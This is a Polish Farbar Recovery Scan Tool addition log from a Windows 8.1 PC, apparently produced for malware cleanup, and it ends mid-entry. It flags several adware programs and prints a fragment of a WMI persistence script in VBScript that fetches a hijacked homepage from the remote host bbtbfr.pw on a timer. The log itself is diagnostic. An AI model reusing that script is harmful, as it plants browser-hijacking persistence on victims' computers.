Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 17-01-2021 Uruchomiony przez Byaku (17-01-2021 14:00:20) Uruchomiony z C:\Users\Byaku\Downloads Windows 8.1 (Update) (X64) (2015-03-03 17:17:35) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2709180964-3026329352-173763364-500 - Administrator - Disabled) Byaku (S-1-5-21-2709180964-3026329352-173763364-1001 - Administrator - Enabled) => C:\Users\Byaku Gość (S-1-5-21-2709180964-3026329352-173763364-501 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Panda Dome (Enabled - Up to date) {CF440CD9-5435-10B1-04E0-7768B6F10320} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Panda Dome (Enabled - Up to date) {7425ED3D-720F-1F3F-3E50-4C1ACD76499D} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version: - ) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.2.1.441 - Adobe Systems Incorporated) Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated) Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated) Adobe Illustrator CS6 (HKLM-x32\...\{4869414E-7AEA-4C8E-BE1C-8D40977FD517}) (Version: 16.0 - Adobe Systems Incorporated) Adobe Media Encoder CC 2018 (HKLM-x32\...\AME_12_1_1) (Version: 12.1.1 - Adobe Systems Incorporated) Aktualizacje NVIDIA 16.13.56 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 16.13.56 - NVIDIA Corporation) Hidden Alcor Micro USB Card Reader (HKLM-x32\...\{66DC436D-02B4-48F5-AF30-01EDED35168F}) (Version: 20.2.1245.53580 - Alcor Micro Corp.) Hidden Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 20.2.1245.53580 - Alcor Micro Corp.) AlphaGo (HKLM-x32\...\{118B6258-BF13-47C9-8D46-B2A349196B5D}) (Version: 1.0.0 - Default Company Name) <==== UWAGA AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name) <==== UWAGA AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name) <==== UWAGA AlphaGo (HKLM-x32\...\{B20B3A3C-91E3-4326-8A0F-B3C012574F8C}) (Version: 1.1.2 - Default Company Name) <==== UWAGA AlphaGo (HKLM-x32\...\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}) (Version: 1.2.5 - AlphaGo) <==== UWAGA amuleC (HKLM-x32\...\{19539992-061C-4E8B-9053-07B175303AF4}) (Version: 1.0.1 - amuleC) <==== UWAGA Animate (HKLM\...\{F0857D72-1EA4-4296-ABB3-A92E70528206}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden BikaQ Rss (HKLM-x32\...\{3678D164-84DB-4F73-AFD6-916342E10764}) (Version: 3.0.17 - BikaQ) <==== UWAGA BikaQ Rss Reader (HKLM-x32\...\{56B2B28A-E663-4D28-84A3-3846068A7D63}) (Version: 1.0.0 - BikaQ) <==== UWAGA Brother MFL-Pro Suite DCP-195C (HKLM-x32\...\{6BF66AED-3EA4-4106-B240-5CE96C9B76B0}) (Version: 2.0.0.0 - Brother Industries, Ltd.) calibre (HKLM-x32\...\{6C358B17-1145-46D8-85E0-57FFFCA93BFC}) (Version: 2.56.0 - Kovid Goyal) Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.3.2.2 - Dolby Laboratories Inc) Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc) DPower version 1.0 (HKLM-x32\...\DPower_is1) (Version: 1.0 - WeMonetize) <==== UWAGA Energy Manager (HKLM-x32\...\{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.27 - Lenovo) Hidden Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.27 - Lenovo) FontForge (wersja 31-07-2017) (HKLM-x32\...\{56748B9C-19AE-4689-B8C5-5A45AE0A993A}_is1) (Version: 31-07-2017 - FontForgeBuilds) FontLab Studio 5 (HKLM-x32\...\{F6E36639-10C8-4FAD-AF1F-E84D5B6653D1}) (Version: 5.0.4 - FontLab) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.145 - Google Inc.) Hidden IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6490.0 - IDT) Infonaut 1.10.0.13 (HKLM-x32\...\Infonaut_1.10.0.13) (Version: 1.10.0.13 - Infonaut) <==== UWAGA Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1013 - Intel Corporation) Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.14.1724 - Intel Corporation) Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology (HKLM\...\{444400C1-6BDF-4FD1-1306-148929CC1385}) (Version: 3.0.1306.0342 - Intel Corporation) istartsurf uninstall (HKLM-x32\...\istartsurf uninstall) (Version: - istartsurf) Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.23.27820 (HKLM-x32\...\{852adda4-4c78-4a38-b583-c0b360a329d6}) (Version: 14.23.27820.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation) My Web Shield (HKLM\...\mweshield) (Version: 3.0 - My Web Shield) <==== UWAGA NVIDIA GeForce Experience 2.1.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.3 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation) NVIDIA Sterownik graficzny 344.48 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 344.48 - NVIDIA Corporation) Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (HKLM\...\{E237254B-36A1-3D27-815E-B37C13BE0796}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (HKLM-x32\...\{03077B58-6ACF-32CA-B42A-EAA458C295A1}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Pakiet sterowników systemu Windows - Intel (NETwNe64) net (02/21/2013 15.6.1.6) (HKLM\...\8D9612122FB122E74AABD8B727C58E14ED36030A) (Version: 02/21/2013 15.6.1.6 - Intel) Pakiet sterowników systemu Windows - Intel (NETwNs64) net (01/22/2012 14.3.2.1) (HKLM\...\CD88F0FADE1395C9F91302912FD35B13CF75C196) (Version: 01/22/2012 14.3.2.1 - Intel) Pakiet sterowników systemu Windows - Intel (NETwNs64) net (01/23/2013 15.4.1.1) (HKLM\...\EDB3AFE3A78039CF2ECCA4716CFA00C670559BEA) (Version: 01/23/2013 15.4.1.1 - Intel) Pakiet sterowników systemu Windows - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo) Pakiet sterowników systemu Windows - Lenovo (WUDFRd) LenovoVhid (06/19/2012 10.13.29.733) (HKLM\...\8A223E56FB1ED4F697B54E5BF96F1EB63B512684) (Version: 06/19/2012 10.13.29.733 - Lenovo) Panda Devices Agent (HKLM-x32\...\{DB0164A2-ADE9-4FEE-B080-D506BDD6427F}) (Version: 1.08.09 - Panda Security) Hidden Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.09 - Panda Security) Hidden Panda Dome (HKLM\...\{10EDA2C8-03AB-4C27-BDC4-39143A81B12F}) (Version: 11.12.30 - Panda Security) Hidden Panda Dome (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 20.00.00.0001 - Panda Security) Panel sterowania NVIDIA 344.48 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 344.48 - NVIDIA Corporation) Hidden PaperPort Image Printer 64-bit (HKLM\...\{ABA4FAF1-6389-45F9-92CE-3914A4E5C471}) (Version: 1.00.0000 - Nuance Communications, Inc.) PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden Pentablet wersja 1.6.4.200810 (HKLM\...\{5DAB8C1A-6D8E-467D-BE62-AC13087AA950}_is1) (Version: 1.6.4.200810 - ) PhotoScape (HKLM-x32\...\PhotoScape) (Version: - ) Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PLK) (Version: 10.0.50903 - Microsoft Corporation) Qualcomm Atheros Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.21 - Qualcomm Atheros Inc.) Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft) SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 3.1.1000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 16.13.56 - NVIDIA Corporation) Hidden VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN) YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (HKLM\...\{25FB53C5-BE4C-3B6C-A0C9-D49A39227E1E}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (HKLM-x32\...\{68DC347D-C1C0-3DE2-A53E-CCC71DA53E57}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Packages: ========= Bing Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.1.177_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Bing Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.1.176_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Games -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.20.0_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] News -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Skype -> C:\Program Files\WindowsApps\Microsoft.SkypeApp_2.0.0.5011_x86__kzf8qxf38zg5c [2020-05-28] (Skype) [MS Ad] Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Travel -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.2.41.0_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] ==================== Niestandardowe rejestracje CLSID (filtrowane): ============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc -> Google Inc.) <==== UWAGA CustomCLSID: HKU\S-1-5-21-2709180964-3026329352-173763364-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems) ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [6671064 2013-12-18] (Microsoft Corporation -> Microsoft Corporation) ShellExecuteHooks: Brak nazwy - {E725373E-AA7E-11E6-9275-64006A5CFC23} - C:\Users\Byaku\AppData\Roaming\Stergerswefepy\Wrerghclltion.dll -> Brak pliku <==== UWAGA ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [4171480 2013-12-18] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers1: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers1: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) ContextMenuHandlers2: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers4: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2014-09-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-10-16] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers5: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers6: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) ==================== Codecs (filtrowane) ==================== ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== UWAGA WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== UWAGA WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== UWAGA WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== UWAGA WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (dane wartości zawierają 2410 znaków więcej).] <==== UWAGA Shortcut: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Kinga - Chrome.lnk -> C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9 () ShortcutWithArgument: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}"; ShortcutWithArgument: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d249d9ddd424b688\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default ==================== Załadowane moduły (filtrowane) ============= 2015-03-09 16:39 - 2009-02-27 16:38 - 000139264 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll 2016-04-29 07:12 - 2016-04-29 07:12 - 000037888 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre-launcher.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000224768 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_lcms_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001206272 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_magick_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000064000 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libexslt.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001069568 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libxml2.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000176128 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libxslt.dll 2014-05-03 22:25 - 2014-05-03 22:25 - 000110080 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\pywintypes27.dll 2014-12-10 11:23 - 2014-12-10 11:23 - 000426496 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\sqlite3.dll 2016-04-29 07:11 - 2016-04-29 07:11 - 000043520 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\magick.pyd 2016-04-29 07:12 - 2016-04-29 07:12 - 000057344 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\progress_indicator.pyd 2016-04-29 07:12 - 2016-04-29 07:12 - 000035840 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\wpd.pyd 2015-03-09 16:40 - 2012-06-05 15:59 - 000025299 ____R (Brother Industries, Ltd) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\brlm03a.dll 2015-03-09 16:40 - 2008-11-26 10:25 - 000208896 ____N (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrFirmUpdateCheck.dll 2015-03-09 16:40 - 2008-08-18 18:27 - 000122880 ____N (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\brlmw03a.dll 2015-03-09 16:40 - 2011-04-11 13:10 - 000163840 ____N (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BRMFCWNDPol.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000050176 ____R (Carlo Baldassi) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_lqr_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000449536 ____R (David Turner, Robert Wilhelm, & Werner Lemberg) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_ttf_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004041728 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Core.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004427264 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Gui.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000553472 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Multimedia.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000084992 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5MultimediaWidgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000820224 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Network.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000268288 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5OpenGL.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000166400 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Positioning.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000263680 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5PrintSupport.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000150528 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Sensors.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000239616 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Svg.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 015911936 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak 